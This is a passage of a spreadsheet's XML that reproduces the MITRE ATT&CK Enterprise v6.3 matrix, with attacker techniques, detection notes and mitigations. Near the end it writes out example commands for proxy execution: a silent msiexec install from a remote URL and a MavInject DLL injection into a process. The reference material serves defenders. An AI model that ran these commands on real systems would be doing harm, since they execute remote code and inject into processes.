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37395" windowHeight="16935"/>
  </bookViews>
  <sheets>
    <sheet name="MITRE ATT&amp;CK Enterprise v6.3" sheetId="1" r:id="rId1"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="0" hidden="1">'MITRE ATT&amp;CK Enterprise v6.3'!$A$1:$L$783</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="0">'MITRE ATT&amp;CK Enterprise v6.3'!$1:$1</definedName>
  </definedNames>
  <calcPr calcId="145621" calcOnSave="0" concurrentCalc="0"/>
</workbook>
</file>

<file path=xl/calcChain.xml><?xml version="1.0" encoding="utf-8"?>
<calcChain xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <c r="L2" i="1" l="1"/>
  <c r="G2" i="1"/>
  <c r="F2" i="1"/>
  <c r="E2" i="1"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="5777" uniqueCount="3858">
  <si>
    <t>Notes</t>
  </si>
  <si>
    <t>Level</t>
  </si>
  <si>
    <t>Control Name</t>
  </si>
  <si>
    <t>Control ID</t>
  </si>
  <si>
    <t>-</t>
  </si>
  <si>
    <t>Control Text</t>
  </si>
  <si>
    <t>STATISTICS</t>
  </si>
  <si>
    <t>MITRE ATT&amp;CK (Adversarial Tactics, Techniques, and Common Knowledge)
Enterprise Matrix (incl. Cloud)
v6.3 (20191024)</t>
  </si>
  <si>
    <t>Detection</t>
  </si>
  <si>
    <t>Mitigation</t>
  </si>
  <si>
    <t>T1156</t>
  </si>
  <si>
    <t>.bash_profile and .bashrc</t>
  </si>
  <si>
    <t>&lt;code&gt;~/.bash_profile&lt;/code&gt; and &lt;code&gt;~/.bashrc&lt;/code&gt; are shell scripts that contain shell commands. These files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the &lt;code&gt;~/.bash_profile&lt;/code&gt; script is executed before the initial command prompt is returned to the user. After that, every time a new shell is opened, the &lt;code&gt;~/.bashrc&lt;/code&gt; script is executed. This allows users more fine-grained control over when they want certain commands executed. These shell scripts are meant to be written to by the local user to configure their own environment. 
The macOS Terminal.app is a little different in that it runs a login shell by default each time a new terminal window is opened, thus calling &lt;code&gt;~/.bash_profile&lt;/code&gt; each time instead of &lt;code&gt;~/.bashrc&lt;/code&gt;.
Adversaries may abuse these shell scripts by inserting arbitrary shell commands that may be used to execute other binaries to gain persistence. Every time the user logs in or opens a new shell, the modified ~/.bash_profile and/or ~/.bashrc scripts will be executed.(Citation: amnesia malware).</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</si>
  <si>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</si>
  <si>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Making these files immutable and only changeable by certain administrators will limit the ability for adversaries to easily create user level persistence.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1156</t>
  </si>
  <si>
    <t>Kill Chain Phases</t>
  </si>
  <si>
    <t>Data Sources</t>
  </si>
  <si>
    <t>Persistence</t>
  </si>
  <si>
    <t>Platforms</t>
  </si>
  <si>
    <t>-  Parsed the official JSON for relevant fields.
-  Enumerated Tactics, Techniques, Mitigations, Groups, and Software.
-  Correlated Tactics with Techniques.
-  Correlated Mitigation Summaries with Tactics.
-  Combined multiple columns into one.
-  FUTURE VER.: Correlate relationships.
-  Content derived from the official ATT&amp;CK Enterprise JSON, available from the website below.
*** https://attack.mitre.org</t>
  </si>
  <si>
    <t>Type</t>
  </si>
  <si>
    <t>TA0001</t>
  </si>
  <si>
    <t>Tactic</t>
  </si>
  <si>
    <t>Initial Access</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/tactics/TA0001</t>
  </si>
  <si>
    <t>T1189</t>
  </si>
  <si>
    <t>Technique</t>
  </si>
  <si>
    <t>Drive-by Compromise</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</si>
  <si>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</si>
  <si>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Drive-by compromise relies on there being a vulnerable piece of software on the client end systems. Use modern browsers with security features turned on. Ensure all browsers and plugins kept updated can help prevent the exploit phase of this technique.
For malicious code served up through ads, adblockers can help prevent that code from executing in the first place. Script blocking extensions can help prevent the execution of JavaScript that may commonly be used during the exploitation process.
Browser sandboxes can be used to mitigate some of the impact of exploitation, but sandbox escapes may still exist. (Citation: Windows Blogs Microsoft Edge Sandbox) (Citation: Ars Technica Pwn2Own 2017 VM Escape)
Other types of virtualization and application microsegmentation may also mitigate the impact of client-side exploitation. The risks of additional exploits and weaknesses in implementation may still exist. (Citation: Ars Technica Pwn2Own 2017 VM Escape)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t>
  </si>
  <si>
    <t>Packet capture, Network device logs, Process use of network, Web proxy</t>
  </si>
  <si>
    <t>Windows, Linux</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1189</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</si>
  <si>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</si>
  <si>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</si>
  <si>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then exploiting it may lead to compromise of the underlying instance. This can allow an adversary a path to access the cloud APIs or to take advantage of weak identity and access management policies.
For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)</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</si>
  <si>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</si>
  <si>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Application isolation and least privilege help lesson the impact of an exploit. Application isolation will limit what other processes and system features the exploited target can access, and least privilege for service accounts will limit what permissions the exploited process gets on the rest of the system. Web Application Firewalls may be used to limit exposure of applications.
Segment externally facing servers and services from the rest of the network with a DMZ or on separate hosting infrastructure.
Use secure coding best practices when designing custom software that is meant for deployment to externally facing systems. Avoid issues documented by OWASP, CWE, and other software weakness identification efforts.
Regularly scan externally facing systems for vulnerabilities and establish procedures to rapidly patch systems when critical vulnerabilities are discovered through scanning and through public disclosure.</t>
  </si>
  <si>
    <t>Azure activity logs, AWS CloudTrail logs, Stackdriver logs, Packet capture</t>
  </si>
  <si>
    <t>Linux, Windows</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1190</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</si>
  <si>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</si>
  <si>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</si>
  <si>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initially access and/or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</si>
  <si>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</si>
  <si>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Limit access to remote services through centrally managed concentrators such as VPNs and other managed remote access systems. Deny direct remote access to internal systems through the use of network proxies, gateways, and firewalls. Disable or block remotely available services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1028). Use strong two-factor or multi-factor authentication for remote service accounts to mitigate an adversary's ability to leverage stolen credentials, but be aware of [Two-Factor Authentication Interception](https://attack.mitre.org/techniques/T1111) techniques for some two-factor authentication implementations.</t>
  </si>
  <si>
    <t>persistence, initial-access</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1133</t>
  </si>
  <si>
    <t>T1200</t>
  </si>
  <si>
    <t>Hardware Additions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</si>
  <si>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</si>
  <si>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Asset management systems may help with the detection of computer systems or network devices that should not exist on a network. 
Endpoint sensors may be able to detect the addition of hardware via USB, Thunderbolt, and other external device communication ports.</t>
  </si>
  <si>
    <t>Establish network access control policies, such as using device certificates and the 802.1x standard. (Citation: Wikipedia 802.1x) Restrict use of DHCP to registered devices to prevent unregistered devices from communicating with trusted systems. 
Block unknown devices and accessories by endpoint security configuration and monitoring agent.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1200</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Disable Autorun if it is unnecessary. (Citation: Microsoft Disable Autorun) Disallow or restrict removable media at an organizational policy level if it is not required for business operations. (Citation: TechNet Removable Media Control)
Identify potentially malicious software that may be used to infect removable media or may result from tainted removable media, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</t>
  </si>
  <si>
    <t>lateral-movement, initial-access</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1091</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Network intrusion prevention systems and systems designed to scan and remove malicious email attachments can be used to block activity. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.
Block unknown or unused attachments by default that should not be transmitted over email as a best practice to prevent some vectors, such as .scr, .exe, .pif, .cpl, etc. Some email scanning devices can open and analyze compressed and encrypted formats, such as zip and rar that may be used to conceal malicious attachments in [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).
Because this technique involves user interaction on the endpoint, it's difficult to fully mitigate. However, there are potential mitigations. Users can be trained to identify social engineering techniques and spearphishing emails. To prevent the attachments from executing, application whitelisting can be used. Anti-virus can also automatically quarantine suspicious files.</t>
  </si>
  <si>
    <t>File monitoring, Packet capture, Network intrusion detection system, Detonation chamber</t>
  </si>
  <si>
    <t>Windows, macOS</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1193</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Because this technique involves user interaction on the endpoint, it's difficult to fully mitigate. However, there are potential mitigations. Users can be trained to identify social engineering techniques and spearphishing emails with malicious links. Determine if certain websites that can be used for spearphishing are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk. Other mitigations can take place as [User Execution](https://attack.mitre.org/techniques/T1204) occurs.</t>
  </si>
  <si>
    <t>Packet capture, Web proxy, Email gateway, Detonation chamber</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1192</t>
  </si>
  <si>
    <t>T1194</t>
  </si>
  <si>
    <t>Spearphishing via Service</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Determine if certain social media sites, personal webmail services, or other service that can be used for spearphishing is necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.
Because this technique involves use of legitimate services and user interaction on the endpoint, it's difficult to fully mitigate. However, there are potential mitigations. Users can be trained to identify social engineering techniques and spearphishing emails with malicious links. To prevent the downloads from executing, application whitelisting can be used. Anti-virus can also automatically quarantine suspicious files.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1194</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Apply supply chain risk management (SCRM) practices and procedures (Citation: MITRE SE Guide 2014), such as supply chain analysis and appropriate risk management, throughout the life-cycle of a system.
Leverage established software development lifecycle (SDLC) practices (Citation: NIST Supply Chain 2012): 
* Uniquely Identify Supply Chain Elements, Processes, and Actors
* Limit Access and Exposure within the Supply Chain
* Establish and Maintain the Provenance of Elements, Processes, Tools, and Data
* Share Information within Strict Limits
* Perform SCRM Awareness and Training
* Use Defensive Design for Systems, Elements, and Processes
* Perform Continuous Integrator Review
* Strengthen Delivery Mechanisms
* Assure Sustainment Activities and Processes
* Manage Disposal and Final Disposition Activities throughout the System or Element Life Cycle
A patch management process should be implemented to check unused dependencies, unmaintained and/or previously vulnerable dependencies, unnecessary features, components, files, and documentation. Continuous monitoring of vulnerability sources and the use of automatic and manual code review tools should also be implemented as well. (Citation: OWASP Top 10 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1195</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Network segmentation can be used to isolate infrastructure components that do not require broad network access. Properly manage accounts and permissions used by parties in trusted relationships to minimize potential abuse by the party and if the party is compromised by an adversary. Vet the security policies and procedures of organizations that are contracted for work that require privileged access to network resources.</t>
  </si>
  <si>
    <t>Azure activity logs, Stackdriver logs, AWS CloudTrail logs, Application logs</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1199</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</si>
  <si>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</si>
  <si>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</si>
  <si>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 
Accounts that an adversary may use can fall into three categories: default, local, and domain accounts. Default accounts are those that are built-into an OS such as Guest or Administrator account on Windows systems or default factory/provider set accounts on other types of systems, software, or devices. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. (Citation: Microsoft Local Accounts Feb 2019) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.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Default accounts are also not limited to Guest and Administrator on client machines, they also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or COTS. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed private keys, or stolen private keys, to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021) (Citation: Metasploit SSH Module)
The overlap of account access,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</si>
  <si>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 xml:space="preserve">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 </t>
  </si>
  <si>
    <t xml:space="preserve">Take measures to detect or prevent techniques such as [Credential Dumping](https://attack.mitre.org/techniques/T1003) or installation of keyloggers to acquire credentials through [Input Capture](https://attack.mitre.org/techniques/T1056). Limit credential overlap across systems to prevent access if account credentials are obtained. Ensure that local administrator accounts have complex, unique passwords across all systems on the network.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 (Citation: Microsoft Securing Privileged Access) 
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Applications and appliances that utilize default username and password should be changed immediately after the installation, and before deployment to a production environment. (Citation: US-CERT Alert TA13-175A Risks of Default Passwords on the Internet) When possible, applications that use SSH keys should be updated periodically and properly secured. </t>
  </si>
  <si>
    <t>defense-evasion, persistence</t>
  </si>
  <si>
    <t>AWS CloudTrail logs, Stackdriver logs, Authentication logs, Process monitoring</t>
  </si>
  <si>
    <t>Linux, macOS</t>
  </si>
  <si>
    <t>User, Administrator</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1078</t>
  </si>
  <si>
    <t>TA0002</t>
  </si>
  <si>
    <t>Execution</t>
  </si>
  <si>
    <t xml:space="preserve">The adversary is trying to run malicious code.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 </t>
  </si>
  <si>
    <t>https://attack.mitre.org/tactics/TA0002</t>
  </si>
  <si>
    <t>T1155</t>
  </si>
  <si>
    <t>AppleScript</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</si>
  <si>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command-line via &lt;code&gt;osascript /path/to/script&lt;/code&gt; or &lt;code&gt;osascript -e "script here"&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Monitor for execution of AppleScript through osascript that may be related to other suspicious behavior occurring on the system.</t>
  </si>
  <si>
    <t>Require that all AppleScript be signed by a trusted developer ID before being executed - this will prevent random AppleScript code from executing  (Citation: applescript signing). This subjects AppleScript code to the same scrutiny as other .app files passing through Gatekeeper.</t>
  </si>
  <si>
    <t>execution, lateral-movement</t>
  </si>
  <si>
    <t>API monitoring, System calls, Process monitoring, Process command-line parameters</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1155</t>
  </si>
  <si>
    <t>T1191</t>
  </si>
  <si>
    <t>CMSTP</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</si>
  <si>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</si>
  <si>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</si>
  <si>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CMSTP.exe may not be necessary within a given environment (unless using it for VPN connection installation). Consider using application whitelisting configured to block execution of CMSTP.exe if it is not required for a given system or network to prevent potential misuse by adversaries. (Citation: MSitPros CMSTP Aug 2017)</t>
  </si>
  <si>
    <t>defense-evasion, execution</t>
  </si>
  <si>
    <t>Process monitoring, Process command-line parameters, Process use of network, Windows event logs</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1191</t>
  </si>
  <si>
    <t>T1059</t>
  </si>
  <si>
    <t>Command-Line Interface</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Audit and/or block command-line interpreters by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1059</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Consider blocking download/transfer and execution of potentially uncommon file types known to be used in adversary campaigns, such as CHM files. (Citation: PaloAlto Preventing Opportunistic Attacks Apr 2016) Also consider using application whitelisting to prevent execution of hh.exe if it is not required for a given system or network to prevent potential misuse by adversaries.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1223</t>
  </si>
  <si>
    <t>T1175</t>
  </si>
  <si>
    <t>Component Object Model and Distributed COM</t>
  </si>
  <si>
    <t>Adversaries may use the Windows Component Object Model (COM) and Distributed Component Object Model (DCOM) for local code execution or to execute on remote systems as part of lateral movement. 
COM is a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Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) DCOM is transparent middleware that extends the functionality of Component Object Model (COM) (Citation: Microsoft COM) beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)
Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry. (Citation: Microsoft COM ACL)(Citation: Microsoft Process Wide Com Keys)(Citation: Microsoft System Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.
Adversaries may abuse COM for local command and/or payload execution. Various COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and VBScript.(Citation: Microsoft COM) Specific COM objects also exists to directly perform functions beyond code execution, such as creating a [Scheduled Task](https://attack.mitre.org/techniques/T1053), fileless download/execution, and other adversary behaviors such as Privilege Escalation and Persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP Apr 2018)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methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: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</si>
  <si>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[PowerShell](https://attack.mitre.org/techniques/T1086),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</si>
  <si>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lateral-movement, execution</t>
  </si>
  <si>
    <t>PowerShell logs, API monitoring, Authentication logs, DLL monitoring</t>
  </si>
  <si>
    <t>Administrator, SYSTEM</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1175</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of operating system design features. For example, mitigating specific Windows API calls and/or execution of particular file extensions will likely have unintended side effects, such as preventing legitimate software (i.e., drivers and configuration tools) from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identification of subsequent malicious behavior.
Restrict storage and execution of Control Panel items to protected directories, such as &lt;code&gt;C:\Windows&lt;/code&gt;, rather than user directories.
Index known safe Control Panel items and block potentially malicious software using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown executable files.
Consider fully enabling User Account Control (UAC) to impede system-wide changes from illegitimate administrators. (Citation: Microsoft UAC)</t>
  </si>
  <si>
    <t>API monitoring, Binary file metadata, DLL monitoring, Windows Registry</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1196</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Registry keys specific to Microsoft Office feature control security can be set to disable automatic DDE/OLE execution. (Citation: Microsoft DDE Advisory Nov 2017) (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: GitHub Disable DDEAUTO Oct 2017) Microsoft also created, and enabled by default, Registry keys to completely disable DDE execution in Word and Excel. (Citation: Microsoft ADV170021 Dec 2017)
Ensure Protected View is enabled (Citation: Microsoft Protected View) and consider disabling embedded files in Office programs, such as OneNote, not enrolled in Protected View. (Citation: Enigma Reviving DDE Jan 2018) (Citation: GitHub Disable DDEAUTO Oct 2017)
On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent DDE attacks and spawning of child processes from Office programs. (Citation: Microsoft ASR Nov 2017) (Citation: Enigma Reviving DDE Jan 2018)</t>
  </si>
  <si>
    <t>API monitoring, DLL monitoring, Process monitoring, Windows Registry</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1173</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Mitigating specific API calls will likely have unintended side effects, such as preventing legitimate software from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior. Audit and/or block potentially malicious software by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1106</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Directly mitigating module loads and API calls related to module loads will likely have unintended side effects, such as preventing legitimate software from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying and correlated subsequent behavior to determine if it is the result of malicious activity.</t>
  </si>
  <si>
    <t>API monitoring, DLL monitoring, File monitoring, Process monitoring</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1129</t>
  </si>
  <si>
    <t>T1203</t>
  </si>
  <si>
    <t>Exploitation for Client Execution</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</si>
  <si>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</si>
  <si>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Browser sandboxes can be used to mitigate some of the impact of exploitation, but sandbox escapes may still exist. (Citation: Windows Blogs Microsoft Edge Sandbox) (Citation: Ars Technica Pwn2Own 2017 VM Escape)
Other types of virtualization and application microsegmentation may also mitigate the impact of client-side exploitation. The risks of additional exploits and weaknesses in implementation may still exist. (Citation: Ars Technica Pwn2Own 2017 VM Escape)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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1203</t>
  </si>
  <si>
    <t>T1061</t>
  </si>
  <si>
    <t>Graphical User Interface</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Prevent adversaries from gaining access to credentials through Credential Access that can be used to log into remote desktop sessions on systems.
Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to log into remote interactive sessions, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) and Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</t>
  </si>
  <si>
    <t>File monitoring, Process monitoring, Process command-line parameters, Binary file metadata</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1061</t>
  </si>
  <si>
    <t>T1118</t>
  </si>
  <si>
    <t>InstallUtil</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</si>
  <si>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LOLBAS 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</si>
  <si>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</si>
  <si>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InstallUtil may not be necessary within a given environment. Use application whitelisting configured to block execution of InstallUtil.exe if it is not required for a given system or network to prevent potential misuse by adversaries.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1118</t>
  </si>
  <si>
    <t>T1152</t>
  </si>
  <si>
    <t>Launchctl</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Prevent users from installing their own launch agents or launch daemons and instead require them to be pushed out by group policy.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1152</t>
  </si>
  <si>
    <t>T1168</t>
  </si>
  <si>
    <t>Local Job Scheduling</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized users can create scheduled jobs. Identify and block unnecessary system utilities or potentially malicious software that may be used to schedule jobs using whitelisting tools.</t>
  </si>
  <si>
    <t>persistence, execution</t>
  </si>
  <si>
    <t>Administrator, User</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1168</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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On Windows 8.1 and Server 2012 R2, enable LSA Protection by setting the Registry key &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL&lt;/code&gt; to &lt;code&gt;dword:00000001&lt;/code&gt;. (Citation: Microsoft LSA Protection Mar 2014) LSA Protection ensures that LSA plug-ins and drivers are only loaded if they are digitally signed with a Microsoft signature and adhere to the Microsoft Security Development Lifecycle (SDL) process guidance.
On Windows 10 and Server 2016, enable Windows Defender Credential Guard (Citation: Microsoft Enable Cred Guard April 2017) to run lsass.exe in an isolated virtualized environment without any device drivers. (Citation: Microsoft Credential Guard April 2017)
Ensure safe DLL search mode is enabled &lt;code&gt;HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\SafeDllSearchMode&lt;/code&gt; to mitigate risk that lsass.exe loads a malicious code library. (Citation: Microsoft DLL Security)</t>
  </si>
  <si>
    <t>execution, persistence</t>
  </si>
  <si>
    <t>API monitoring, DLL monitoring, File monitoring, Kernel drivers</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1177</t>
  </si>
  <si>
    <t>T1170</t>
  </si>
  <si>
    <t>Mshta</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</si>
  <si>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LOLBAS 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</si>
  <si>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</si>
  <si>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Mshta.exe may not be necessary within a given environment since its functionality is tied to older versions of Internet Explorer that have reached end of life. Use application whitelisting configured to block execution of mshta.exe if it is not required for a given system or network to prevent potential misuse by adversaries.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1170</t>
  </si>
  <si>
    <t>T1086</t>
  </si>
  <si>
    <t>PowerShell</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</si>
  <si>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[Empire](https://attack.mitre.org/software/S0363),  PowerSploit, (Citation: Powersploit) and PSAttack. (Citation: Github PSAttack)
PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015) (Citation: Microsoft PSfromCsharp APR 2014)</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</si>
  <si>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 (Citation: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</si>
  <si>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It may be possible to remove PowerShell from systems when not needed, but a review should be performed to assess the impact to an environment, since it could be in use for many legitimate purposes and administrative functions. When PowerShell is necessary, restrict PowerShell execution policy to administrators and to only execute signed scripts. Be aware that there are methods of bypassing the PowerShell execution policy, depending on environment configuration. (Citation: Netspi PowerShell Execution Policy Bypass) Disable/restrict the WinRM Service to help prevent uses of PowerShell for remote execution.</t>
  </si>
  <si>
    <t>PowerShell logs, Loaded DLLs, DLL monitoring, Windows Registry</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1086</t>
  </si>
  <si>
    <t>T1121</t>
  </si>
  <si>
    <t>Regsvcs/Regasm</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Regsvcs and Regasm may not be necessary within a given environment. Block execution of Regsvcs.exe and Regasm.exe if they are not required for a given system or network to prevent potential misuse by adversaries.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1121</t>
  </si>
  <si>
    <t>T1117</t>
  </si>
  <si>
    <t>Regsvr32</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block regsvr32.exe from being used to bypass whitelisting. (Citation: Secure Host Baseline EMET)</t>
  </si>
  <si>
    <t>Loaded DLLs, Process monitoring, Windows Registry, Process command-line parameters</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1117</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block methods of using rundll32.exe to bypass whitelisting. (Citation: Secure Host Baseline EMET)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1085</t>
  </si>
  <si>
    <t>T1053</t>
  </si>
  <si>
    <t>Scheduled Task</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized administrators can create scheduled tasks on remote systems. Toolkits like the PowerSploit framework contain PowerUp modules that can be used to explore systems for permission weaknesses in scheduled tasks that could be used to escalate privileges. (Citation: Powersploit)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(Citation: TechNet Scheduling Priority)
Identify and block unnecessary system utilities or potentially malicious software that may be used to schedule tasks using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</t>
  </si>
  <si>
    <t>File monitoring, Process monitoring, Process command-line parameters, Windows event logs</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1053</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</si>
  <si>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</si>
  <si>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</si>
  <si>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[PowerShell](https://attack.mitre.org/techniques/T1086)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Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)</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</si>
  <si>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</si>
  <si>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Turn off unused features or restrict access to scripting engines such as VBScript or scriptable administration frameworks such as PowerShell.
Configure Office security settings enable Protected View, to execute within a sandbox environment, and to block macros through Group Policy. (Citation: Microsoft Block Office Macros) Other types of virtualization and application microsegmentation may also mitigate the impact of compromise. The risks of additional exploits and weaknesses in implementation may still exist. (Citation: Ars Technica Pwn2Own 2017 VM Escape)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1064</t>
  </si>
  <si>
    <t>T1035</t>
  </si>
  <si>
    <t>Service Execution</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Ensure that permissions disallow services that run at a higher permissions level from being created or interacted with by a user with a lower permission level. Also ensure that high permission level service binaries cannot be replaced or modified by users with a lower permission level.
Identify unnecessary system utilities or potentially malicious software that may be used to interact with Windows services,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</si>
  <si>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https://attack.mitre.org/techniques/T1035</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Msiexec.exe
Msiexec.exe is the command-line Windows utility for the Windows Installer. Adversaries may use msiexec.exe to launch malicious MSI files for code execution. An adversary may use it to launch local or network accessible MSI files.(Citation: LOLBAS Msiexec)(Citation: Rancor Unit42 June 2018)(Citation: TrendMicro Msiexec Feb 2018) Msiexec.exe may also be used to execute DLLs.(Citation: LOLBAS Msiexec)
* &lt;code&gt;msiexec.exe /q /i "C:\path\to\file.msi"&lt;/code&gt;
* &lt;code&gt;msiexec.exe /q /i http[:]//site[.]com/file.msi&lt;/code&gt;
* &lt;code&gt;msiexec.exe /y "C:\path\to\file.dll"&lt;/code&gt;
### Mavinject.exe
Mavinject.exe is a Windows utility that allows for code execution. Mavinject can be used to input a DLL into a running process. (Citation: Twitter gN3mes1s Status Update MavInject32)
* &lt;code&gt;"C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe" &amp;lt;PID&amp;gt; /INJECTRUNNING &amp;lt;PATH DLL&amp;gt;&lt;/code&gt;
